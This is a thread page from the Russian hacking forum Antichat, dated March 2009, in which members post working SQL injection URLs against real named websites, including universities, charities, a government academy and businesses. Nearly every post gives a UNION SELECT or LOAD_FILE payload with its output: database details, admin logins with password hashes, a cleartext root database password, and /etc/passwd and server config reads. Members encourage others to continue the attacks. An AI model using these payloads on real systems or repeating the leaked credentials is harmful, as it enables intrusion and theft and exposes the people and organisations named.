ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8331  
Старый 13.03.2009, 17:43
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

тИЦ = 375
PageRank = 8



Цитата:
http://www.ncl.ac.uk/iss/teaching/rooms/locations/room.php?id=90809776656544443348908+union+select+1 ,concat_ws(0x3a,user(),version(),database()),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50,51,52,53,54--

Database Version: 5.0.45-log
Database name: nig6
User name: nig6@van.ncl.ac.uk6



База:


Код:
Database [nig6]
    Table [DigitalSignage  ( Rows)]
        DSID
        NetworkName
        IP
        Location
        timeChecked
        DateChecked
    Table [Digitisers  ( Rows)]
        DigitiserID
        NetworkName
        IP
        Location
    Table [Inventory_Categories  ( Rows)]
        Cat_ID
        Equip_Name
        Cat_Shortcode
        Cost
        PAT
        PAT_Type
        PAT_Interval
    Table [Inventory_Equipment  ( Rows)]
        Equip_ID
        Equipment_Type
        Make
        Model
        Serial_No
        Purchase_Date
        Supplier
        Location
    Table [Inventory_Manufacturers  ( Rows)]
        Manufacturer_ID
        Manufacturer_Name
    Table [Inventory_PAT_Types  ( Rows)]
        PAT_ID
        PAT_Type
    Table [Inventory_Suppliers  ( Rows)]
        Supplier_ID
        Supplier_Name
    Table [LectureRoomAccessibility  ( Rows)]
        AccessibilityID
        Accessibility
    Table [LectureRoomBookings  ( Rows)]
        BookingID
        Booking
    Table [LectureRoomBuildings  ( Rows)]
        BuildingID
        BuildingName
    Table [LectureRoomControl  ( Rows)]
        ControlID
        Control
    Table [LectureRoomFloors  ( Rows)]
        FloorID
        Floor
    Table [LectureRoomMicCollectionPoints  ( Rows)]
        MicID
        Location
    Table [LectureRoomType  ( Rows)]
        TypeID
        Type
    Table [LectureRoomsInfo  ( Rows)]
        ID
        RoomName
        Capacity
        RoomType
        Building
        Floor
        Accessibility
        Recap
        Bookings
        ControlSystem
        DataProjector
        DesktopPC
        DVDPlayer
        SlideProjector
        Visualiser
        OHP
        LaptopConnection
        PA
        LapelRadioMic
        FixedLecternMic
        HandheldRadioMic
        ProjectionScreen
        WritingSurface
        Userinstructions
        RoomInfo
        Telephone
        Image
        InductionLoop
        dateupdated
        datecreated
        DVDMultiregion
        LapelMicNo
        HandheldMicNo
        MicCollection
        RoomAvailable
        Furtherinfo
        Plasma
        projectormodel
        Displaywatch
        Netcam
        RadioMicFreq1
        RadioMicFreq2
        RadioMicFreq3
        RadioMicFreq4
        TelNo
        ProjPurchDate
        LampHours
        ProjSerialNo
        BLANK
        Projector
        DisplayWatch2
        AxisCam2
        DateChecked
        CheckedBy
    Table [Locations  ( Rows)]
        LocationID
        Location
    Table [NewPCData  ( Rows)]
        ID
        DateDeleted
        Manufacturer
        ProcessorType
        ProcessorSpeed
        Memory
        HardDisk
        HDSPACE
        NetworkName
        IPAddress
        MacAddress
        Type
        UserKeeper
        Location
        PO
        SerialNo
        DateChecked
        Opsys
        Resolution
        GraphicsCard
        PurchaseDate
        GP
        timeChecked
        Netcam
        Displaywatch
        GUID
        biosset
        wakeonlan
        lastbootdate
        lastboottime
    Table [RoomStats  ( Rows)]
        TechID
        TechName
        NoChecked
    Table [backupnewpcdata  ( Rows)]
        ID
        DateDeleted
        Manufacturer
        ProcessorType
        ProcessorSpeed
        Memory
        HardDisk
        HDSPACE
        NetworkName
        IPAddress
        MacAddress
        Type
        UserKeeper
    Table [backuprooms  ( Rows)]
        ID
        RoomName
        Capacity
        RoomType
        Building
        Floor
        Accessibility
        Recap
        Bookings
        ControlSystem
        DataProjector
        DesktopPC
        DVDPlayer
        SlideProjector
        Visualiser
        OHP
        LaptopConnection
        PA
        LapelRadioMic
        FixedLecternMic
        HandheldRadioMic
        ProjectionScreen
        WritingSurface
        Userinstructions
        RoomInfo
        Telephone
        Image
        InductionLoop
        dateupdated
        datecreated
        DVDMultiregion
        LapelMicNo
        HandheldMicNo
        MicCollection
        RoomAvailable
        Furtherinfo
        Plasma
        projectormodel
        Displaywatch
        Netcam
        RadioMicFreq1
        RadioMicFreq2
        RadioMicFreq3
        RadioMicFreq4
        TelNo
        ProjPurchDate
        LampHours
        ProjSerialNo
        BLANK
        Projector
        DisplayWatch2
        AxisCam2
    Table [backuproomsnov  ( Rows)]
        ID
        RoomName
        Capacity
        RoomType
        Building
    Table [copyLocations  ( Rows)]
        LocationID
        Location
    Table [copynewPCData  ( Rows)]
        ID
        AssetTag
        Manufacturer
        ProcessorType
        ProcessorSpeed
        Memory
        HardDisk
        HDSPACE
        NetworkName
        IPAddress
        MacAddress
        Type
        UserKeeper
        Location
        PO
        SerialNo
        DateChecked
        Opsys
        Resolution
        GraphicsCard
        PurchaseDate
        GP
        timeChecked
        Netcam
        Displaywatch
    Table [deletedpcs  ( Rows)]
        ID
        DateDeleted
        Manufacturer
        ProcessorType
        ProcessorSpeed
        Memory
        HardDisk
        HDSPACE
        NetworkName
        IPAddress
        MacAddress
        Type
        UserKeeper
        Location
        PO
        SerialNo
        DateChecked
        Opsys
        Resolution
        GraphicsCard
        PurchaseDate
        GP
        timeChecked
        Netcam
        Displaywatch
        GUID
        biosset
        wakeonlan
        lastbootdate
        lastboottime
    Table [lampstock  ( Rows)]
        lampID
        lamp_code
        numberinstock
        numberonorder
        MaxHours
    Table [loanprojectors  ( Rows)]
        loanprojid
        projectormodel
        idcode
        purchasedate
    Table [projectors  ( Rows)]
        projectorID
        makeandmodel
        lamp_code
        instructions
    Table [testpcdata  ( Rows)]
        ID
        DateDeleted
        Manufacturer
        ProcessorType
        ProcessorSpeed
        Memory
        HardDisk
        HDSPACE
        NetworkName
        IPAddress
        MacAddress
        Type
        UserKeeper
        Location
        PO
        SerialNo
        DateChecked
        Opsys
        Resolution
        GraphicsCard
        PurchaseDate
        GP
        timeChecked
        Netcam
        Displaywatch
        GUID
        biosset
        wakeonlan
        lastbootdate
        lastboottime
 
Ответить с цитированием

  #8332  
Старый 13.03.2009, 19:22
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.primariagrosi.ro/primaria-grosi_componenţa%20consiliului%20local-12+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,database(),user()),7,8,9+limit+1,1.html



Database Version: 5.1.30
User name: grosi grosi@localhost
Database name: grosi grosi



таблички и колонки нормальным запросом не получилось, но и не заморачивался сильно.... substring
 
Ответить с цитированием

  #8333  
Старый 13.03.2009, 20:47
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

тИЦ = 325
PageRank = 8


Код:
http://www.bath.ac.uk/robots.txt


Цитата:
http://www.bath.ac.uk/chaplaincy/people/profile.php?id=889087987654434+union+select+1,conc at_ws(0x3a,version(),user(),database()),3,4,5,6,7--

Database Version: 5.0.51b-log
Database name: CHAPLAINCY
User name: chaplaincyuser@snoopy.bath.ac.uk


Пользователи:

Цитата:
http://www.bath.ac.uk/chaplaincy/people/profile.php?id=889087987654434+UNION+SELECT+1,AES_ DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(id, 0x3a,name,0x3a,username,0x3a,password)+FROM+CHAPLA INCY.login+LIMIT+1,1),0x3a),0x71),0x71),3,4,5,6,7--


3 : Tim Wakeling : tjw : fa2b488a77e9c067c5b66b7404943ebb
4 : Mother Sarah : mcs : 2cf11729b85d817ea9de30d9c0d90066
6 : Angela Berners-Wilson : adxab : 8e9b1d3d7b6445bc93dbd769de2fa511



База:


Код:
Database [CHAPLAINCY]
    Table [ann  ( Rows)]
        id
        startdate
        enddate
        announcement
    Table [churchareas  ( Rows)]
        areanumber
        areaname
        areadescription
    Table [churches  ( Rows)]
        id
        churchname
        denomination
        tradition
        churchaddress
        postcode
        area
        ministernames
        contactphone
        contactemail
        churchwebsite
        churchdescription
        servicedetails
        eveningservice
        busroutes
        nearsundaybus
        studentmembers
        otherinfo
    Table [faithsocs  ( Rows)]
        id
        name
        fullname
        description
        emailcontact1
        emailaddress1
        emailcontact2
        emailaddress2
        website
    Table [features  ( Rows)]
        id
        dateadded
        title
        descriptionfirst
        descriptionrest
        article
        author
        filename
    Table [help  ( Rows)]
        id
        sort
        title
        content
    Table [hometexts  ( Rows)]
        id
        setname
        welcometitle
        welcomemessage
        section1
        section2
        section3
        section4
        section5
        section6
        thought
        thoughtby
    Table [info  ( Rows)]
        id
        title
        description
        article
        filename
        invisible
    Table [links  ( Rows)]
        id
        title
        url
        description
        category
    Table [login  ( Rows)]
        id
        name
        username
        password
    Table [people  ( Rows)]
        id
        name
        filename
        role
        email
        website
        profile
    Table [photogalleries  ( Rows)]
        id
        dateadded
        datemodified
        galleryname
        galleryfilename
        gallerysize
        gallerydate
        description
        icon
    Table [photos  ( Rows)]
        id
        galleryid
        orderingallery
        caption
    Table [polls  ( Rows)]
        pollid
        dateposted
        question
        response1
        votesfor1
        response2
        votesfor2
        response3
        votesfor3
        response4
        votesfor4
        response5
        votesfor5
    Table [settings  ( Rows)]
        holiday
        pollsvisible
        eventsonhomepage
    Table [specialevents  ( Rows)]
        id
        startdate
        enddate
        starttime
        endtime
        title
        description
    Table [weeklyevents  ( Rows)]
        id
        day
        start
        end
        description
        allyear





PageRank = 5


Цитата:
http://microarray.csc.mrc.ac.uk//news_item.html?id=55556444444+UNION+SELECT+AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Databa se(),0x3a,User(),0x3a),0x71),0x71),2,3,4,5,6,7,8,9 ,10,11,12-- &name=High%20Sequencing%20Form

Database Version: 5.0.18-nt
Database name: mac_admin
User name: root@localhost




Цитата:
http://microarray.csc.mrc.ac.uk//news_item.html?id=55556444444+UNION+SELECT+AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,user,0x3a,password,0x 3a),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12+from+mysq l.user--

root : *629F73D84581DE883641DF5DC165597AD9ED9D43



Читаем c:\Program Files\Apache Group\Apache2\conf\httpd.conf

Цитата:
http://microarray.csc.mrc.ac.uk//news_item.html?id=55556444444+UNION+SELECT+AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,LOAD_FILE(0x633A5C507 26F6772616D2046696C65735C4170616368652047726F75705 C417061636865325C636F6E665C68747470642E636F6E66),0 x3a),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12-- &name=High%20Sequencing%20Form

Читаем c:\Program Files\Apache Group\Apache2\htdocs\section.html

Цитата:
http://microarray.csc.mrc.ac.uk//news_item.html?id=55556444444+UNION+SELECT+AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,LOAD_FILE(0x633A5C507 26F6772616D2046696C65735C4170616368652047726F75705 C417061636865325C6874646F63735C73656374696F6E2E687 46D6C),0x3a),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12-- &name=High%20Sequencing%20Form

И уже от них пляшем......



Цитата:
http://www.red2black.org.uk/videos.php?id=798665434347987+union+select+1,conca t_ws(0x3a,version(),user(),database()),3,4,5,6,7,8--
Database Version: 5.0.67-community
Database name: red2blac_cms
User name: red2blac_cms@localhost


Цитата:
http://www.thefixuk.co.uk/events/people.php?id=899890798768765434+union+select+1,co ncat_ws(0x3a,version(),user(),database()),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19--
Version:4.0.27-max-log
User:dbo252263493@212.227.66.241
Database:db252263493




Цитата:
http://www.forklift-attachments.co.uk/product_detail.php?store_cat_id=132&prod_id=798369 877457986+union+select+1,2,3,4,concat_ws(0x3a,vers ion(),user(),database()),6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49--
Version:4.1.22
User:con_user@localhost
Database:con001

Последний раз редактировалось spherics; 13.03.2009 в 22:05..
 
Ответить с цитированием

  #8334  
Старый 13.03.2009, 22:06
Аватар для z00MAN
z00MAN
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980

Репутация: 930
По умолчанию

Engage - the anti-racist campaign against antisemitism
Код:
http://www.engageonline.org.uk/archives/index.php?id=-13'+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3/*
user(): engage@localhost
database(): engageonline_org_uk
version(): 4.0.15

Код:
http://www.engageonline.org.uk/archives/index.php?id=-13'+union+select+1,concat(log,0x3a,pass),3+from+users/*
hougo:ab4f63f9ac65152575886860dde480a1:azerty


www.engageonline.org.uk/blog/admin/

ЧиновникЪ.uapa.ru Официальный сайт Академии Госслужбы

Код:
http://chinovnik.uapa.ru/modern/issue.php?id=-13'+union+select+null,LOAD_FILE('c:/boot.ini'),null,null/*
PHP код:
[boot loadertimeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINNT [operating systemsmulti(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Advanced Server" /fastdetect C:\CMDCONS\BOOTSECT.DAT="Microsoft Windows 2000 Recovery Console" /cmdcons ' () 
user(): root@localhost
database(): chinovnik
version(): 5.0.27-community

PR=5

FILE_PRIV=Y
путь=C:\server\vhosts_uapa\chinovnik.uapa.ru\www\

дерзайте..
 
Ответить с цитированием

  #8335  
Старый 13.03.2009, 22:30
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

PR - 4


Цитата:
http://www.sclou.org/index.php?id=887654346+union+select+1,AES_DECRYPT( AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(), 0x3a,User(),0x3a),0x71),0x71),3,4,5,6,7,8--
Version:5.0.18-standard-log
Database:sclou
User:terregen@localhost


Цитата:
http://www.sclou.org/index.php?id=887654346+union+select+1,AES_DECRYPT( AES_ENCRYPT(CONCAT(0x3a,Password,0x3a,User,0x3a),0 x71),0x71),3,4,5,6,7,8+from+mysql.user--

*3585AAEF496B5FB4D4BE7C06B61EDB1FDA828703 : root




Цитата:
http://www.msia.org/msia.qry?ID=480980976546+union+select+1,2,3,concat _ws(0x3a,version(),user(),database()),5,6,7--
Version:4.1.20-log
User:msia@localhost
Database:msia


Цитата:
http://www.msia.org/msia.qry?ID=480980976546+union+select+1,2,3,concat _ws(0x3a,user,password),5,6,7+from+mysql.user--

root : 7433abd2154c7925


PageRank = 6

Цитата:
http://www.aarda.org/press_release_display.php?ID=79847980986+union+sel ect+1,2,3,concat_ws(0x3a,version(),user(),database ()),5,6,7--
Version:4.1.22
User:aarda@lhost9.atlantic.net
Database:aarda

Последний раз редактировалось spherics; 13.03.2009 в 22:49..
 
Ответить с цитированием

  #8336  
Старый 13.03.2009, 23:30
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://www.cedema.org/ver.php?id=-1519+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15--
4.1.22
 
Ответить с цитированием

  #8337  
Старый 13.03.2009, 23:34
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

2IP Показал 78 сайтов

Цитата:
http://www.bitterrootlandtrust.org/gateway.php?plugin=3&o=viewnews&parent=27&id=57654 68766+union+select+1,2,3,concat_ws(0x3a,version(), user(),database()),5,6--

Database Version: 4.1.22-standard-log
Database name: brit
User name: root@localhost

Цитата:
http://www.bitterrootlandtrust.org/gateway.php?plugin=3&o=viewnews&parent=27&id=57654 68766+union+select+1,2,3,concat_ws(0x3a,user,passw ord),5,6+from+mysql.user+limit+0,1--

root : 1e775af3568b3992

Читаем etc/passwd

Цитата:
http://www.bitterrootlandtrust.org/gateway.php?plugin=3&o=viewnews&parent=27&id=57654 68766+UNION+SELECT+1,2,3,CONCAT(0x3a,LOAD_FILE(0x2 F6574632F706173737764),0x3a),5,6--
Читаем /etc/httpd/conf/httpd.conf

Цитата:
http://www.bitterrootlandtrust.org/gateway.php?plugin=3&o=viewnews&parent=27&id=57654 68766+UNION+SELECT+1,2,3,CONCAT(0x3a,LOAD_FILE(0x2 F6574632F68747470642F636F6E662F68747470642E636F6E6 6),0x3a),5,6--

Читаем конфиг базы /var/www/html/bcm/settings.php

Цитата:
http://www.bitterrootlandtrust.org/gateway.php?plugin=3&o=viewnews&parent=27&id=57654 68766+UNION+SELECT+1,2,3,CONCAT(0x3a,LOAD_FILE(0x2 F7661722F7777772F68746D6C2F62636D2F73657474696E677 32E706870),0x3a),5,6--

//database settings, variable names should explain themselves
$mysql_server = 'localhost'; //as in localhost
$mysql_username = ' root ';
$mysql_password = ' save406 ';
$mysql_database = ' brit ';
//

И впрёёёёддд.......



Цитата:
https://thedfi.hs-cluster-1.net/event.php?id=8897654322+union+select+1,concat_ws(0 x3a,version(),user(),database()),3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47--

Database Version: 5.0.67-log
Database name: thedfi_data
User name: thedfi_user@65.99.201.17

Наверное это Админчег

Цитата:
https://thedfi.hs-cluster-1.net/event.php?id=8897654322+UNION+SELECT+1,CONCAT(0x3a ,(SELECT+CONCAT(username,0x3a,upassword,0x3a,email address,0x3a,firstname,0x3a,lastname,0x3a,security level)+FROM+thedfi_data.passwords+LIMIT+1,1),0x3a) ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42,43,44,45,46,47--

: shott : 38108a1210ec0f39 : : Shirley : Hott : 1
 
Ответить с цитированием

  #8338  
Старый 13.03.2009, 23:42
Аватар для Assembler
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964

Репутация: 302
Отправить сообщение для Assembler с помощью ICQ
По умолчанию

Код:
http://www.melnikov-tex.ru/
1

Version: 4.1.22
Database:
User:
Код:
http://www.melnikov-tex.ru/about/more.php?id=9991%20union%20select%201,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10,11,12,13%20from%20users--
Админка:
Логин: adm1285
Пользователь: 41d7e23b31063b763cbf6a1322e0cec5
 
Ответить с цитированием

  #8339  
Старый 13.03.2009, 23:54
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.zvezdy.ru/company/news/?id=-1+union+select+1,2,3,4,concat_ws(0x3a,vers ion(),database(),user()),6,7,8,9,10,11--
Database Version : 5.0.67-log
Database name : u32942
User name : u32942@10.10.227.65


админы :

Код:
http://www.zvezdy.ru/company/news/?id=-1+union+select+1,2,3,4,concat(login,0x3a,passwo rd),6,7,8,9,10,11+from+ADMINS+limit+0,1--
Код:
kadry:d14b580f553ef88c15227a48d09db390
user:ee11cbb19052e40b07aac0ca060c23ee
margo:a31a83e3eb0bc30c5e373ae45b532622
Liqvidator-pdtpls:2f7db3cad1563fffbf526f6aadf2dfa1
bars:3dac72783f355eb5f7204a16e28581aa
fin:e1a63ee61e0d3423eb9b28d35c478d49
admin:98e2f8e1b90d4399dcd0dd4ad40cb2da
pro:4328908bba95a0fc6f6ad00e5e121871
 
Ответить с цитированием

  #8340  
Старый 13.03.2009, 23:56
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

todosurf.com
Код:
http://www.todosurf.com/noticias/ver.php?id=-334+union+select+1,2,3,4,5,6,7,8,9--
5.0.67-community-log
tables:
Код:
17:comentarios
18:contacto
19:encuesta
20:enlaces
21:estadisticas
22:fotos
23:noticias
24:puntuacion
25:usuarios
26:videos
27:webcams
28:webcams_visitas
29:zona_continente
30:zona_pais
31:zona_provincia
32:zona_spot
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ